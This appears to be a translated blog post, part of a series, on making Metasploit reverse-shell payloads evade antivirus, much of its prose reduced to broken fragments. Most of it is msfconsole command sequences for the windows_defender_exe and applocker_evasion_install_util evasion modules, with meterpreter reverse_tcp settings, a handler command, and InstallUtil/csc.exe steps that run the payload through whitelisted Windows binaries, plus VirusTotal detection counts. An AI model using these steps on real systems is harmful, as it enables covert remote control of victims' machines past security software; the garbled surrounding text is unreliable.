[26917] 2020-02-19_Remote-Control AV Evasion Series (4) - Evasion Module AV Evasion (VT evasion rate 12/71)

Document creator: s7ckTeam
Last updated: 2025-01-19
(4) - Evasion (VT 12/71)
Ms08067 2020-02-19
Tide

1. (1) - https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
2. (2) - msfvenom https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w
3. (3) - msf (VT 35/69) https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA
4. (4) - Evasion (VT 12/71)

1. Bypass
2. payload msf
3. 360 360+360 (2019.12.12) (2019.12.12) 360
Tide . TideWeb//AI https://github.com/TideSec/BypassAntiVirus
windows/meterpreter/reverse_tcp 5.0.0.8160 5.0.33.13 12.0.0.2001 (2019.12.17)
4. VT

2019 1 metasploit 5.0 Evasion evasion

exe (VT 42/71)

payload virustotal.com

show evasion
use windows/windows_defender_exe

    msf5 > use windows/windows_defender_exe
    msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
    msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
    msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
    msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
    msf5 evasion(windows/windows_defender_exe) > run

    handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp

360 360 virustotal.com 42/71 39...

hta (VT 14/59)

evasion 360 windows/windows_defender_js_hta
+
virustotal.com 14/59 360

install_util (VT 12/71)

evasion payload csc.exe csc.exe .NET Framework C# .net vs2017 csc.exe install_util.exe windows/applocker_evasion_install_util

    msf5 > use windows/applocker_evasion_install_util
    msf5 evasion(windows/applocker_evasion_install_util) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 evasion(windows/applocker_evasion_install_util) > set lhost 10.211.55.2
    lhost => 10.211.55.2
    msf5 evasion(windows/applocker_evasion_install_util) > set lport 3333
    lport => 3333
    msf5 evasion(windows/applocker_evasion_install_util) > run
    [+] install_util.txt stored at /Users/xysoul/.msf4/local/install_util.txt
    [*] Copy install_util.txt to the target
    [*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:install_util.exe install_util.txt
    [*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe

InstallUtil.exe
32 payload 32 .net InstallUtil 360 install_util.exe

    InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe

virustotal.com 12/71

evasion 6 csc payload 2019 1 msf5 evasion: Csc.exe payload install_util.exe Metasploit::Framework::Compiler

applocker_evasion_install_util.md https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji